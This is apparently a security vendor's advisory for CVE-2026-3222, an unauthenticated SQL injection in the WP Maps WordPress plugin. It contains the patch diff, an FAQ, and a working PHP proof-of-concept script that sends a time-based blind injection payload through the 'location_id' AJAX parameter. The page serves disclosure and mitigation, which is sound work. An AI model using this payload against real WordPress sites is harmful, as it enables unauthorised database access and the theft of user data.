-			$entityID = intval( $_POST['entityID'] ?? 0 );
-			$where    = $entityID > 0 ? array( $this->unique => $entityID ) : '';
-
-			$data   = apply_filters( 'wpgmp_route_save', $data, $where );
-			$result = FlipperCode_Database::insert_or_update( $this->table, $data, $where );
-
-			$response = array();
-			if ( false === $result ) {
-				$response['error'] = esc_html__( 'Something went wrong. Please try again.', 'wp-google-map-plugin' );
-			} elseif ( $entityID > 0 ) {
-				$response['success'] = esc_html__( 'Route was updated successfully.', 'wp-google-map-plugin' );
-			} else {
-				$response['success'] = esc_html__( 'Route was added successfully.', 'wp-google-map-plugin' );
-			}
-			$response['last_db_id'] = $result;
-
-			do_action( 'wpgmp_after_route_save', $response, $data, $entityID );
-
-			return $response;
+
 		}

 		public function delete() {
-			if ( isset( $_GET['route_id'] ) ) {
-				$id         = intval( wp_unslash( $_GET['route_id'] ) );
-				$connection = FlipperCode_Database::connect();
-				$query      = $connection->prepare( "DELETE FROM $this->table WHERE $this->unique = %d", $id );
-				$result     = FlipperCode_Database::non_query( $query, $connection );
-
-				do_action( 'wpgmp_after_route_deleted', $id, $result );
-				return $result;
-			}
-			return false;
+
 		}
 	}
 }
 No newline at end of file
--- a/wp-google-map-plugin/wp-google-map-plugin.php
+++ b/wp-google-map-plugin/wp-google-map-plugin.php
@@ -7,7 +7,7 @@
  * Author URI: https://weplugins.com/
  * License: GPL v2 or later
  * License URI: https://www.gnu.org/licenses/gpl-2.0.html
- * Version: 4.9.1
+ * Version: 4.9.2
  * Text Domain: wp-google-map-plugin
  * Domain Path: /lang
 */
@@ -74,7 +74,6 @@
 			add_action( 'widgets_init', 				  [ $this, 'wpgmp_google_map_widget'] );
 			add_action( 'wp_enqueue_scripts', 			  [ $this, 'wpgmp_frontend_scripts'] );
 			add_action( 'wp_ajax_wpgmp_ajax_call', 		  [ $this, 'wpgmp_ajax_call'] );
-			add_action( 'wp_ajax_nopriv_wpgmp_ajax_call', [ $this, 'wpgmp_ajax_call'] );

 			add_filter( 'media_upload_tabs', 			  [ $this, 'wpgmp_google_map_tabs_filter']);
 			add_filter( 'fc-dummy-placeholders', 		  [ $this, 'wpgmp_apply_placeholders'] );
@@ -233,23 +232,38 @@
 			}
 		}

-		function wpgmp_return_final_capability($cap){
+		function wpgmp_return_final_capability( $cap ) {

-			if ( current_user_can('administrator') ) {
+			global $wpdb;
+			if ( current_user_can( 'administrator' ) ) {
 				return $cap;
 			}
-			// phpcs:ignore WordPress.Security.NonceVerification.Recommended -- Reading page parameter for checking capability only
-			$frontend_page = ( !is_admin() && isset( $_GET['location_id'] ) && !empty( $_GET['location_id'] ) && isset($_GET['doaction']) && !empty($_GET['doaction']) && isset($_GET['cap']) && !empty($_GET['cap']) && $_GET['cap'] == 'wpgmp_manage_location' ) ? true : false;
-			// phpcs:ignore WordPress.Security.NonceVerification.Recommended -- Reading page parameter for checking capability only
-			$backend_page = ( is_admin() && isset( $_GET['location_id'] ) && !empty( $_GET['location_id'] ) && isset($_GET['doaction']) && !empty($_GET['doaction']) && isset($_GET['page']) && !empty($_GET['page']) && $_GET['page'] == 'wpgmp_manage_location' ) ? true : false;
-
-			if($frontend_page || $backend_page){
-
-				$model_factory = new WPGMP_Model();
-				$location_obj = $model_factory->create_object( 'location' );
-				$location_data = $location_obj->fetch( array( array( 'location_id', '=', $_GET['location_id'] ) ) );
-				if(get_current_user_id() != $location_data[0]->location_author){
-					$cap = '';
+
+			// Sanitize GET values
+			$location_id = isset( $_GET['location_id'] ) ? absint( sanitize_text_field( $_GET['location_id'] ) ) : '';
+			$doaction    = isset( $_GET['doaction'] ) ? sanitize_text_field( wp_unslash( $_GET['doaction'] ) ) : '';
+			$get_cap     = isset( $_GET['cap'] ) ? sanitize_text_field( wp_unslash( $_GET['cap'] ) ) : '';
+			$page        = isset( $_GET['page'] ) ? sanitize_text_field( wp_unslash( $_GET['page'] ) ) : '';
+
+
+			$backend_page = (
+				is_admin() &&
+				! empty( $location_id ) &&
+				! empty( $doaction ) &&
+				$page === 'wpgmp_manage_location'
+			) ? true : false;
+
+			if ( $backend_page ) {
+
+				$location_data = $wpdb->get_results( $wpdb->prepare(
+				    "SELECT * FROM {$wpdb->prefix}map_locations WHERE location_id = %d",
+				    intval( $location_id )
+				) );
+
+				if ( ! empty( $location_data ) && isset( $location_data[0]->location_author ) ) {
+					if ( get_current_user_id() !== (int) $location_data[0]->location_author ) {
+						$cap = '';
+					}
 				}
 			}

@@ -1351,7 +1365,7 @@

 			if ( is_admin() )
 			$this->wpgmp_define( 'WPGMP_SLUG', 'wpgmp_view_overview' );
-			$this->wpgmp_define( 'WPGMP_VERSION', '4.9.1' );
+			$this->wpgmp_define( 'WPGMP_VERSION', '4.9.2' );
 			$this->wpgmp_define( 'WPGMP_FOLDER', basename( dirname( __FILE__ ) ) );
 			$this->wpgmp_define( 'WPGMP_DIR', plugin_dir_path( __FILE__ ) );
 			$this->wpgmp_define( 'WPGMP_ICONS_DIR', WPGMP_DIR . '/assets/images/icons/' );

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3222 - WP Maps <= 4.9.1 - Unauthenticated SQL Injection via 'location_id' Parameter
<?php

$target_url = 'http://vulnerable-site.com/wp-admin/admin-ajax.php';

// Malicious location_id parameter.
// The backticks cause the plugin to treat the payload as a column name, bypassing esc_sql().
// The payload uses SLEEP() for time-based blind SQL injection.
$location_id = '`location_id` AND SLEEP(5)-- -';

$post_data = [
    'action' => 'wpgmp_ajax_call',
    'doaction' => 'wpgmp_return_final_capability',
    'location_id' => $location_id,
    'cap' => 'wpgmp_manage_location'
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 15); // Increase timeout for sleep payload

$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);

$elapsed = $end_time - $start_time;
curl_close($ch);

if ($elapsed > 5) {
    echo "[+] SQL Injection successful. Response delayed by " . round($elapsed, 2) . " seconds.n";
    echo "Response: " . htmlspecialchars($response) . "n";
} else {
    echo "[-] No time delay detected. Target may not be vulnerable.n";
    echo "Response time: " . round($elapsed, 2) . " seconds.n";
}

?>

Frequently Asked Questions

What is CVE-2026-3222?
Overview of the vulnerability
CVE-2026-3222 is a high-severity SQL injection vulnerability found in the WP Maps plugin for WordPress. It allows unauthenticated attackers to exploit the ‘location_id’ parameter to execute arbitrary SQL queries, potentially extracting sensitive information from the database.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from the plugin’s database abstraction layer, which improperly handles user input wrapped in backticks. This allows attackers to bypass SQL escaping functions and inject SQL code through the ‘location_id’ parameter in AJAX requests.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the WP Maps plugin version 4.9.1 or earlier is affected by this vulnerability. Administrators should check their plugin version and update if necessary.
How can I check if my site is vulnerable?
Version verification steps
To check if your site is vulnerable, verify the version of the WP Maps plugin installed on your WordPress site. If it is version 4.9.1 or earlier, it is susceptible to CVE-2026-3222.
How can I mitigate this vulnerability?
Steps to secure your site
The recommended mitigation is to update the WP Maps plugin to version 4.9.2 or later, where the vulnerability has been patched. Additionally, consider implementing security measures such as web application firewalls.
What does the CVSS score of 7.5 indicate?
Understanding the severity rating
A CVSS score of 7.5 indicates a high severity level, meaning the vulnerability poses a significant risk to the confidentiality and integrity of the affected systems. Exploitation does not require authentication, making it particularly dangerous.
What are the practical risks of this vulnerability?
Potential impacts on security
If exploited, this vulnerability can allow attackers to extract sensitive data from the database, including user credentials and other confidential information. This can lead to further attacks and data breaches.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept demonstrates how an attacker can craft an AJAX request with a malicious ‘location_id’ parameter containing SQL injection payloads. This allows the attacker to execute time-based blind SQL injection attacks against the vulnerable site.
What changes were made in the patched version?
Improvements in version 4.9.2
In version 4.9.2, the plugin’s method for identifying column names was rewritten to prevent SQL injection. It now validates input against a whitelist of allowed column names, and AJAX calls are restricted to authenticated users only.
What is time-based blind SQL injection?
Understanding the attack technique
Time-based blind SQL injection is a technique where an attacker determines if an SQL query is successful based on the time it takes for the server to respond. By injecting a payload that causes a delay, the attacker can infer information about the database.
How can I stay informed about vulnerabilities?
Best practices for security awareness
To stay informed about vulnerabilities, regularly follow security advisories, subscribe to security mailing lists, and monitor the CVE database. It is also advisable to keep all plugins and themes updated to their latest versions.
What are the implications of not addressing this vulnerability?
Consequences of inaction
Failing to address this vulnerability can lead to unauthorized access to sensitive data, which may result in data breaches, loss of user trust, and potential legal repercussions for non-compliance with data protection regulations.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations